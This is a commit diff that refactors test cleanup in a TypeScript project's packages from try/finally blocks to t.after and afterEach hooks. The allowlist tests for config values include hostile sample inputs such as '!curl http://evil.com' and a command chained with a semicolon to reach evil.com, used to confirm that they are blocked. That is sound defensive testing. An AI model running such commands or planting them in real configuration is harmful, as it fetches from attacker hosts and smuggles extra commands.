refactor(test): replace try/finally with beforeEach/afterEach in packages tests (#2390)

This commit is contained in:
Tom Boucher 2026-03-24 23:34:10 -04:00 committed by GitHub
parent 77460942ac
commit e4d21c40d0
7 changed files with 228 additions and 245 deletions

View file

@@ -287,7 +287,7 @@ describe("AuthStorage — oauth credential for non-OAuth provider (#2083)", () =
assert.equal(key, undefined);
});
it("falls through to env var when openrouter has type:oauth credential", async () => {
it("falls through to env var when openrouter has type:oauth credential", async (t) => {
const storage = inMemory({
openrouter: {
type: "oauth",
@@ -299,17 +299,17 @@ describe("AuthStorage — oauth credential for non-OAuth provider (#2083)", () =
// Simulate OPENROUTER_API_KEY being set via env
const origEnv = process.env.OPENROUTER_API_KEY;
try {
process.env.OPENROUTER_API_KEY = "sk-or-v1-env-key";
const key = await storage.getApiKey("openrouter");
assert.equal(key, "sk-or-v1-env-key");
} finally {
t.after(() => {
if (origEnv === undefined) {
delete process.env.OPENROUTER_API_KEY;
} else {
process.env.OPENROUTER_API_KEY = origEnv;
}
}
});
process.env.OPENROUTER_API_KEY = "sk-or-v1-env-key";
const key = await storage.getApiKey("openrouter");
assert.equal(key, "sk-or-v1-env-key");
});
it("falls through to fallback resolver when openrouter has type:oauth credential", async () => {

View file

@@ -48,37 +48,37 @@ function makeThrowingExtension(eventType: string, error: Error): Extension {
}
describe("ExtensionRunner.emitToolCall", () => {
it("catches throwing extension handler and routes to emitError", async () => {
it("catches throwing extension handler and routes to emitError", async (t) => {
const dir = mkdtempSync(join(tmpdir(), "runner-test-"));
try {
const sessionManager = SessionManager.create(dir, dir);
const authStorage = AuthStorage.create();
const modelRegistry = new ModelRegistry(authStorage, join(dir, "models.json"));
const throwingExt = makeThrowingExtension("tool_call", new Error("handler crashed"));
const runtime = makeMinimalRuntime();
const runner = new ExtensionRunner([throwingExt], runtime, dir, sessionManager, modelRegistry);
const errors: any[] = [];
runner.onError((err) => errors.push(err));
const event: ToolCallEvent = {
type: "tool_call",
toolCallId: "test-123",
toolName: "test_tool",
input: {},
} as ToolCallEvent;
const result = await runner.emitToolCall(event);
// Should not throw — error is caught and routed to emitError
assert.equal(result, undefined);
assert.equal(errors.length, 1);
assert.equal(errors[0].error, "handler crashed");
assert.equal(errors[0].event, "tool_call");
assert.equal(errors[0].extensionPath, "/test/throwing-ext");
} finally {
t.after(() => {
rmSync(dir, { recursive: true, force: true });
}
});
const sessionManager = SessionManager.create(dir, dir);
const authStorage = AuthStorage.create();
const modelRegistry = new ModelRegistry(authStorage, join(dir, "models.json"));
const throwingExt = makeThrowingExtension("tool_call", new Error("handler crashed"));
const runtime = makeMinimalRuntime();
const runner = new ExtensionRunner([throwingExt], runtime, dir, sessionManager, modelRegistry);
const errors: any[] = [];
runner.onError((err) => errors.push(err));
const event: ToolCallEvent = {
type: "tool_call",
toolCallId: "test-123",
toolName: "test_tool",
input: {},
} as ToolCallEvent;
const result = await runner.emitToolCall(event);
// Should not throw — error is caught and routed to emitError
assert.equal(result, undefined);
assert.equal(errors.length, 1);
assert.equal(errors[0].error, "handler crashed");
assert.equal(errors[0].event, "tool_call");
assert.equal(errors[0].extensionPath, "/test/throwing-ext");
});
});

View file

@@ -1,66 +1,54 @@
import assert from "node:assert/strict";
import { describe, it } from "node:test";
import { describe, it, afterEach } from "node:test";
import { mkdtempSync, readFileSync, rmSync, existsSync } from "node:fs";
import { join } from "node:path";
import { tmpdir } from "node:os";
import { atomicWriteFileSync } from "./fs-utils.js";
describe("atomicWriteFileSync", () => {
it("writes file content atomically", () => {
const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
try {
const filePath = join(dir, "test.txt");
atomicWriteFileSync(filePath, "hello world");
assert.equal(readFileSync(filePath, "utf-8"), "hello world");
} finally {
let dir: string;
afterEach(() => {
if (dir) {
rmSync(dir, { recursive: true, force: true });
}
});
it("writes file content atomically", () => {
dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
const filePath = join(dir, "test.txt");
atomicWriteFileSync(filePath, "hello world");
assert.equal(readFileSync(filePath, "utf-8"), "hello world");
});
it("overwrites existing file atomically", () => {
const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
try {
const filePath = join(dir, "test.txt");
atomicWriteFileSync(filePath, "first");
atomicWriteFileSync(filePath, "second");
assert.equal(readFileSync(filePath, "utf-8"), "second");
} finally {
rmSync(dir, { recursive: true, force: true });
}
dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
const filePath = join(dir, "test.txt");
atomicWriteFileSync(filePath, "first");
atomicWriteFileSync(filePath, "second");
assert.equal(readFileSync(filePath, "utf-8"), "second");
});
it("does not leave .tmp file after successful write", () => {
const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
try {
const filePath = join(dir, "test.txt");
atomicWriteFileSync(filePath, "content");
assert.equal(existsSync(filePath + ".tmp"), false);
} finally {
rmSync(dir, { recursive: true, force: true });
}
dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
const filePath = join(dir, "test.txt");
atomicWriteFileSync(filePath, "content");
assert.equal(existsSync(filePath + ".tmp"), false);
});
it("supports Buffer content", () => {
const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
try {
const filePath = join(dir, "test.bin");
const buf = Buffer.from([0x00, 0x01, 0x02, 0xff]);
atomicWriteFileSync(filePath, buf);
const result = readFileSync(filePath);
assert.deepEqual(result, buf);
} finally {
rmSync(dir, { recursive: true, force: true });
}
dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
const filePath = join(dir, "test.bin");
const buf = Buffer.from([0x00, 0x01, 0x02, 0xff]);
atomicWriteFileSync(filePath, buf);
const result = readFileSync(filePath);
assert.deepEqual(result, buf);
});
it("supports encoding parameter", () => {
const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
try {
const filePath = join(dir, "test.txt");
atomicWriteFileSync(filePath, "utf8 content", "utf-8");
assert.equal(readFileSync(filePath, "utf-8"), "utf8 content");
} finally {
rmSync(dir, { recursive: true, force: true });
}
dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
const filePath = join(dir, "test.txt");
atomicWriteFileSync(filePath, "utf8 content", "utf-8");
assert.equal(readFileSync(filePath, "utf-8"), "utf8 content");
});
});

View file

@@ -38,21 +38,20 @@ describe("resolveConfigValue — non-command values", () => {
});
describe("resolveConfigValue — command allowlist enforcement", () => {
it("blocks a disallowed command and returns undefined", () => {
it("blocks a disallowed command and returns undefined", (t) => {
const stderrChunks: string[] = [];
const originalWrite = process.stderr.write.bind(process.stderr);
process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => {
stderrChunks.push(chunk.toString());
return true;
};
try {
const result = resolveConfigValue("!curl http://evil.com");
assert.equal(result, undefined);
assert.ok(stderrChunks.some((line) => line.includes("curl")));
} finally {
t.after(() => {
process.stderr.write = originalWrite;
}
});
const result = resolveConfigValue("!curl http://evil.com");
assert.equal(result, undefined);
assert.ok(stderrChunks.some((line) => line.includes("curl")));
});
it("blocks another disallowed command (rm)", () => {
@@ -65,7 +64,7 @@ describe("resolveConfigValue — command allowlist enforcement", () => {
assert.equal(result, undefined);
});
it("allows a safe command prefix to proceed to execution", () => {
it("allows a safe command prefix to proceed to execution", (t) => {
// `pass` is unlikely to be installed in CI, so we just verify it does NOT
// return undefined due to the allowlist check — it may return undefined if
// the binary is absent, but the block path must not be taken.
@@ -76,16 +75,15 @@ describe("resolveConfigValue — command allowlist enforcement", () => {
stderrChunks.push(chunk.toString());
return true;
};
try {
resolveConfigValue("!pass show nonexistent-entry-for-test");
const blocked = stderrChunks.some((line) =>
line.includes("Blocked disallowed command")
);
assert.equal(blocked, false, "pass should not be blocked by the allowlist");
} finally {
t.after(() => {
process.stderr.write = originalWrite;
}
});
resolveConfigValue("!pass show nonexistent-entry-for-test");
const blocked = stderrChunks.some((line) =>
line.includes("Blocked disallowed command")
);
assert.equal(blocked, false, "pass should not be blocked by the allowlist");
});
});
@@ -130,61 +128,58 @@ describe("resolveConfigValue — shell operator bypass prevention", () => {
assert.equal(result, undefined);
});
it("writes stderr warning when shell operators detected", () => {
it("writes stderr warning when shell operators detected", (t) => {
const stderrChunks: string[] = [];
const originalWrite = process.stderr.write.bind(process.stderr);
process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => {
stderrChunks.push(chunk.toString());
return true;
};
try {
resolveConfigValue("!pass show key; curl evil.com");
assert.ok(stderrChunks.some((line) => line.includes("shell operators")));
} finally {
t.after(() => {
process.stderr.write = originalWrite;
}
});
resolveConfigValue("!pass show key; curl evil.com");
assert.ok(stderrChunks.some((line) => line.includes("shell operators")));
});
});
describe("resolveConfigValue — caching", () => {
it("caches the result of a blocked command", () => {
it("caches the result of a blocked command", (t) => {
const callCount = { n: 0 };
const originalWrite = process.stderr.write.bind(process.stderr);
process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => {
callCount.n++;
return true;
};
try {
resolveConfigValue("!curl http://evil.com");
resolveConfigValue("!curl http://evil.com");
// The block warning should only fire once; the second call hits the cache
// before reaching the allowlist check, so stderr count is 1.
assert.equal(callCount.n, 1);
} finally {
t.after(() => {
process.stderr.write = originalWrite;
}
});
resolveConfigValue("!curl http://evil.com");
resolveConfigValue("!curl http://evil.com");
// The block warning should only fire once; the second call hits the cache
// before reaching the allowlist check, so stderr count is 1.
assert.equal(callCount.n, 1);
});
it("clearConfigValueCache resets cached entries", () => {
it("clearConfigValueCache resets cached entries", (t) => {
const stderrChunks: string[] = [];
const originalWrite = process.stderr.write.bind(process.stderr);
process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => {
stderrChunks.push(chunk.toString());
return true;
};
try {
resolveConfigValue("!curl http://evil.com");
assert.equal(stderrChunks.length, 1);
clearConfigValueCache();
resolveConfigValue("!curl http://evil.com");
assert.equal(stderrChunks.length, 2);
} finally {
t.after(() => {
process.stderr.write = originalWrite;
}
});
resolveConfigValue("!curl http://evil.com");
assert.equal(stderrChunks.length, 1);
clearConfigValueCache();
resolveConfigValue("!curl http://evil.com");
assert.equal(stderrChunks.length, 2);
});
});

View file

@@ -1,5 +1,5 @@
import assert from "node:assert/strict";
import { describe, it } from "node:test";
import { describe, it, afterEach } from "node:test";
import { mkdtempSync, rmSync } from "node:fs";
import { join } from "node:path";
import { tmpdir } from "node:os";
@@ -22,44 +22,44 @@ function makeAssistantMessage(input: number, output: number, cacheRead = 0, cach
}
describe("SessionManager usage totals", () => {
it("tracks assistant usage incrementally without rescanning entries", () => {
const dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-"));
try {
const manager = SessionManager.create(dir, dir);
let dir: string;
manager.appendMessage({ role: "user", content: [{ type: "text", text: "hello" }] } as any);
manager.appendMessage(makeAssistantMessage(10, 5, 3, 2, 0.25));
manager.appendMessage(makeAssistantMessage(7, 4, 1, 0, 0.1));
assert.deepEqual(manager.getUsageTotals(), {
input: 17,
output: 9,
cacheRead: 4,
cacheWrite: 2,
cost: 0.35,
});
} finally {
afterEach(() => {
if (dir) {
rmSync(dir, { recursive: true, force: true });
}
});
it("tracks assistant usage incrementally without rescanning entries", () => {
dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-"));
const manager = SessionManager.create(dir, dir);
manager.appendMessage({ role: "user", content: [{ type: "text", text: "hello" }] } as any);
manager.appendMessage(makeAssistantMessage(10, 5, 3, 2, 0.25));
manager.appendMessage(makeAssistantMessage(7, 4, 1, 0, 0.1));
assert.deepEqual(manager.getUsageTotals(), {
input: 17,
output: 9,
cacheRead: 4,
cacheWrite: 2,
cost: 0.35,
});
});
it("resets totals when starting a new session", () => {
const dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-"));
try {
const manager = SessionManager.create(dir, dir);
manager.appendMessage(makeAssistantMessage(5, 5, 0, 0, 0.05));
assert.equal(manager.getUsageTotals().input, 5);
dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-"));
const manager = SessionManager.create(dir, dir);
manager.appendMessage(makeAssistantMessage(5, 5, 0, 0, 0.05));
assert.equal(manager.getUsageTotals().input, 5);
manager.newSession();
assert.deepEqual(manager.getUsageTotals(), {
input: 0,
output: 0,
cacheRead: 0,
cacheWrite: 0,
cost: 0,
});
} finally {
rmSync(dir, { recursive: true, force: true });
}
manager.newSession();
assert.deepEqual(manager.getUsageTotals(), {
input: 0,
output: 0,
cacheRead: 0,
cacheWrite: 0,
cost: 0,
});
});
});

View file

@@ -60,26 +60,26 @@ describe("edit-diff", () => {
assert.match(result.diff, /CHANGED/);
});
it("computes diffs for preview without native helpers", async () => {
it("computes diffs for preview without native helpers", async (t) => {
const dir = mkdtempSync(join(tmpdir(), "edit-diff-test-"));
try {
const file = join(dir, "sample.ts");
writeFileSync(file, "const title = “Hello”;\n", "utf-8");
const result = await computeEditDiff(
file,
"const title = \"Hello\";\n",
"const title = \"Hi\";\n",
dir,
);
assert.ok(!("error" in result), "expected a diff result");
if (!("error" in result)) {
assert.equal(result.firstChangedLine, 1);
assert.match(result.diff, /\+1 const title = "Hi";/);
}
} finally {
t.after(() => {
rmSync(dir, { recursive: true, force: true });
});
const file = join(dir, "sample.ts");
writeFileSync(file, "const title = “Hello”;\n", "utf-8");
const result = await computeEditDiff(
file,
"const title = \"Hello\";\n",
"const title = \"Hi\";\n",
dir,
);
assert.ok(!("error" in result), "expected a diff result");
if (!("error" in result)) {
assert.equal(result.firstChangedLine, 1);
assert.match(result.diff, /\+1 const title = "Hi";/);
}
});
});

View file

@@ -1,5 +1,5 @@
import assert from "node:assert/strict";
import { describe, it, mock } from "node:test";
import { describe, it, afterEach } from "node:test";
import { mkdtempSync, rmSync, readFileSync, existsSync } from "node:fs";
import { join } from "node:path";
import { tmpdir } from "node:os";
@@ -15,84 +15,84 @@ function wait(ms: number): Promise<void> {
}
describe("MemoryStorage debounced persistence", () => {
it("multiple rapid mutations only trigger one persist write", async () => {
const dir = makeTmpDir();
const dbPath = join(dir, "test.db");
try {
const storage = await MemoryStorage.create(dbPath);
let dir: string;
const initialStat = readFileSync(dbPath);
const initialMtime = initialStat.length;
storage.upsertThreads([
{ threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" },
]);
storage.upsertThreads([
{ threadId: "t2", filePath: "/b.txt", fileSize: 200, fileMtime: 2000, cwd: "/proj" },
]);
storage.upsertThreads([
{ threadId: "t3", filePath: "/c.txt", fileSize: 300, fileMtime: 3000, cwd: "/proj" },
]);
const afterMutationsBuf = readFileSync(dbPath);
assert.deepEqual(
afterMutationsBuf,
initialStat,
"File should not have been written yet (debounce window has not elapsed)",
);
await wait(700);
const afterDebounceBuf = readFileSync(dbPath);
assert.notDeepEqual(
afterDebounceBuf,
initialStat,
"File should have been written after debounce window elapsed",
);
const stats = storage.getStats();
assert.equal(stats.totalThreads, 3);
storage.close();
} finally {
afterEach(() => {
if (dir) {
rmSync(dir, { recursive: true, force: true });
}
});
it("multiple rapid mutations only trigger one persist write", async () => {
dir = makeTmpDir();
const dbPath = join(dir, "test.db");
const storage = await MemoryStorage.create(dbPath);
const initialStat = readFileSync(dbPath);
const initialMtime = initialStat.length;
storage.upsertThreads([
{ threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" },
]);
storage.upsertThreads([
{ threadId: "t2", filePath: "/b.txt", fileSize: 200, fileMtime: 2000, cwd: "/proj" },
]);
storage.upsertThreads([
{ threadId: "t3", filePath: "/c.txt", fileSize: 300, fileMtime: 3000, cwd: "/proj" },
]);
const afterMutationsBuf = readFileSync(dbPath);
assert.deepEqual(
afterMutationsBuf,
initialStat,
"File should not have been written yet (debounce window has not elapsed)",
);
await wait(700);
const afterDebounceBuf = readFileSync(dbPath);
assert.notDeepEqual(
afterDebounceBuf,
initialStat,
"File should have been written after debounce window elapsed",
);
const stats = storage.getStats();
assert.equal(stats.totalThreads, 3);
storage.close();
});
it("close() flushes pending changes immediately without waiting for debounce", async () => {
const dir = makeTmpDir();
dir = makeTmpDir();
const dbPath = join(dir, "test.db");
try {
const storage = await MemoryStorage.create(dbPath);
const storage = await MemoryStorage.create(dbPath);
const initialBuf = readFileSync(dbPath);
const initialBuf = readFileSync(dbPath);
storage.upsertThreads([
{ threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" },
]);
storage.upsertThreads([
{ threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" },
]);
const beforeCloseBuf = readFileSync(dbPath);
assert.deepEqual(
beforeCloseBuf,
initialBuf,
"File should not have been written yet (debounce window has not elapsed)",
);
const beforeCloseBuf = readFileSync(dbPath);
assert.deepEqual(
beforeCloseBuf,
initialBuf,
"File should not have been written yet (debounce window has not elapsed)",
);
storage.close();
storage.close();
const afterCloseBuf = readFileSync(dbPath);
assert.notDeepEqual(
afterCloseBuf,
initialBuf,
"File should have been written immediately on close()",
);
const afterCloseBuf = readFileSync(dbPath);
assert.notDeepEqual(
afterCloseBuf,
initialBuf,
"File should have been written immediately on close()",
);
const reopened = await MemoryStorage.create(dbPath);
const stats = reopened.getStats();
assert.equal(stats.totalThreads, 1, "Data should be persisted and readable after close");
reopened.close();
} finally {
rmSync(dir, { recursive: true, force: true });
}
const reopened = await MemoryStorage.create(dbPath);
const stats = reopened.getStats();
assert.equal(stats.totalThreads, 1, "Data should be persisted and readable after close");
reopened.close();
});
});